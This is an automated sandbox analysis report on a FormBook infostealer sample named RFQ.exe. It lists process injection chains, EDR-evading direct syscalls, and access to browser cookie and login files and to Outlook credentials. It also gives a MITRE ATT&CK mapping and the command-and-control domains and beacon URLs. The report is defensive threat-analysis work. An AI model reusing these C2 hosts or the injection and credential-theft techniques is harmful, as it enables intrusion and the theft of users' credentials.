                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_0076A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_007581AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_00758189 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtClose: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\RFQ.exe, Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe, Section loaded: NULL target: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe, Section loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe, Section loaded: NULL target: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe protection: read write
                Source: C:\Windows\SysWOW64\net.exe, Section loaded: NULL target: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\net.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe, Thread register set: target process: 3176
                Source: C:\Windows\SysWOW64\net.exe, Thread APC queued: target process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                Source: C:\Users\user\Desktop\RFQ.exe, Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F87008
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_0076B106 LogonUserW
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_00733D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_0077411C SendInput,keybd_event
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_007774E7 mouse_event
                Source: C:\Users\user\Desktop\RFQ.exe, Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe, Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_0076A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_007771FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: enUILRNjDql.exe, 00000003.00000000.2177169547.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000002.4572668463.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2361806147.0000000001101000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Program Manager
                Source: RFQ.exe, enUILRNjDql.exe, 00000003.00000000.2177169547.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000002.4572668463.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2361806147.0000000001101000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Shell_TrayWnd
                Source: enUILRNjDql.exe, 00000003.00000000.2177169547.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000002.4572668463.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2361806147.0000000001101000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progman
                Source: RFQ.exe, Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: enUILRNjDql.exe, 00000003.00000000.2177169547.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000002.4572668463.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2361806147.0000000001101000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_007565C4 cpuid
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_0078091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_007AB340 GetUserNameW
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_00761E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_0074DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000004.00000002.4572018212.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2291393354.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4574678267.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2291056975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.4573259207.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.4573144434.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.4572938071.00000000047E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2291967315.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\net.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\net.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\net.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\net.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\net.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\net.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\net.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\net.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\net.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: RFQ.exe, Binary or memory string: WIN_81
                Source: RFQ.exe, Binary or memory string: WIN_XP
                Source: RFQ.exe, Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: RFQ.exe, Binary or memory string: WIN_XPe
                Source: RFQ.exe, Binary or memory string: WIN_VISTA
                Source: RFQ.exe, Binary or memory string: WIN_7
                Source: RFQ.exe, Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000004.00000002.4572018212.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2291393354.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4574678267.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2291056975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.4573259207.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.4573144434.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.4572938071.00000000047E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2291967315.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_00788C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_0078923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (the number in brackets is the count of matched signatures; techniques without a count are matrix entries with no match for this sample)

                Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
                Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
                Initial Access: Valid Accounts [2], Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
                Execution: Native API [3], Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
                Persistence: DLL Side-Loading [1], Valid Accounts [2], Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
                Privilege Escalation: Exploitation for Privilege Escalation [1], Abuse Elevation Control Mechanism [1], DLL Side-Loading [1], Valid Accounts [2], Access Token Manipulation [21], Process Injection [412], Startup Items, Scheduled Task/Job, At
                Defense Evasion: Disable or Modify Tools [1], Deobfuscate/Decode Files or Information [1], Abuse Elevation Control Mechanism [1], Obfuscated Files or Information [3], DLL Side-Loading [1], Valid Accounts [2], Virtualization/Sandbox Evasion [2], Access Token Manipulation [21], Process Injection [412]
                Credential Access: OS Credential Dumping [1], Input Capture [21], Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
                Discovery: System Time Discovery [2], Account Discovery [1], File and Directory Discovery [2], System Information Discovery [116], Security Software Discovery [151], Virtualization/Sandbox Evasion [2], Process Discovery [3], Application Window Discovery [11], System Owner/User Discovery [1]
                Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
                Collection: Archive Collected Data [1], Data from Local System [1], Email Collection [1], Input Capture [21], Clipboard Data [3], GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
                Command and Control: Ingress Tool Transfer [4], Encrypted Channel [1], Non-Application Layer Protocol [4], Application Layer Protocol [4], Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: System Shutdown/Reboot [1], Network Denial of Service, Data Encrypted for Impact, Data Destruction, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
                Behavior Graph (ID: 1555881, Sample: RFQ.exe, Start date: 14/11/2024, Architecture: WINDOWS, Score: 100)

                Process chain: RFQ.exe started svchost.exe; svchost.exe injected into enUILRNjDql.exe; enUILRNjDql.exe started net.exe; net.exe injected into enUILRNjDql.exe and started firefox.exe.
                Signatures on the sample: Multi AV Scanner detection for submitted file, Yara detected FormBook, Binary is likely a compiled AutoIt script file, 3 other signatures.
                RFQ.exe: Binary is likely a compiled AutoIt script file, Writes to foreign memory regions, Maps a DLL or memory area into another process, Switches to a custom stack to bypass stack traces.
                svchost.exe: Maps a DLL or memory area into another process.
                enUILRNjDql.exe (injected): Found direct / indirect Syscall (likely to bypass EDR).
                net.exe: Tries to steal Mail credentials (via file / registry access), Tries to harvest and steal browser information (history, passwords, etc), Modifies the context of a thread in another process (thread injection), 3 other signatures.
                DNS/IP: www.066bet.xyz, www.yushaliu.online and 21 other IPs or domains resolved by the sample (Performs DNS queries to domains with low reputation); the injected enUILRNjDql.exe contacted www.pluribiz.life (209.74.64.58, source ports 49992, 49993, 49994, MULTIBAND-NEWHOPEUS, United States), ppp84k45ss7ehy8ypic5x.limelightcdn.com (23.106.59.18, source ports 50020, 50021, 50022, LEASEWEB-UK-LON-11GB, United Kingdom) and 7 other IPs or domains.

                Antivirus detection (Source, Detection, Scanner, Label):
                RFQ.exe, 30%, ReversingLabs, Win32.Trojan.AutoitInject
                RFQ.exe, 100%, Joe Sandbox ML
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                webredir.vip.gandi.net
                217.70.184.50
                truefalse
                  high
                  fiqsth.vip
                  3.33.130.190
                  truefalse
                    unknown
                    bio-thymus.com
                    3.33.130.190
                    truefalse
                      unknown
                      www.pluribiz.life
                      209.74.64.58
                      truefalse
                        high
                        corpseflowerwatch.org
                        3.33.130.190
                        truefalse
                          unknown
                          www.evoo.website
                          128.65.195.180
                          truefalse
                            high
                            www.wukong.college
                            47.52.221.8
                            truefalse
                              high
Name | IP | Active | Malicious | Antivirus Detection | Reputation
marketprediction.app | 3.33.130.190 | true | false | | unknown
www.yushaliu.online | 208.91.197.27 | true | false | | unknown
77980.bodis.com | 199.59.243.227 | true | false | | high
www.kdtzhb.top | 47.242.89.146 | true | false | | high
www.migraine-massages.pro | 199.59.243.227 | true | false | | high
ppp84k45ss7ehy8ypic5x.limelightcdn.com | 23.106.59.18 | true | false | | unknown
www.bulls777.pro | unknown | unknown | false | | unknown
www.astorg-group.info | unknown | unknown | false | | unknown
www.bio-thymus.com | unknown | unknown | false | | unknown
www.marketprediction.app | unknown | unknown | false | | unknown
www.fiqsth.vip | unknown | unknown | false | | unknown
www.vehiculargustav.click | unknown | unknown | false | | unknown
www.corpseflowerwatch.org | unknown | unknown | false | | unknown
www.vnxoso88.art | unknown | unknown | false | | unknown
www.066bet.xyz | unknown | unknown | true | | unknown
www.4nk.education | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.4nk.education/gnvu/ | false | | unknown
http://www.4nk.education/gnvu/?W638b4U=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fjjnnxvqu9VAopw5jutgMYieatrM5Tiebl9fmqoGSNeZ5Og==&Xll=50hLc0Hhy | false | | unknown
http://www.evoo.website/293d/ | false | | unknown
http://www.corpseflowerwatch.org/yjfe/?W638b4U=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRatGgzGgePg7VlA49G10KSSL4yAbTFmYSs1RlWHEt8ktcvA==&Xll=50hLc0Hhy | false | | unknown
http://www.wukong.college/9ezc/?Xll=50hLc0Hhy&W638b4U=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+NZNi8BTPy99Tau97oJsSOpJizwynXn/5fxfwmQ1lNSou+g== | false | | unknown
http://www.vehiculargustav.click/95c0/ | false | | unknown
http://www.fiqsth.vip/0m8a/ | false | | unknown
http://www.marketprediction.app/ucmb/?W638b4U=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLwkKxStK4w4vex/YLsSNnFHqgqyWr0vfKWW8f0ZD4+1Q9hQ==&Xll=50hLc0Hhy | false | | unknown
http://www.migraine-massages.pro/ym43/?W638b4U=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRTsdeZatTq9P8nD3DJaYsKbhsyMI+cP4BIi4vfpBrFLN6oA==&Xll=50hLc0Hhy | false | | unknown
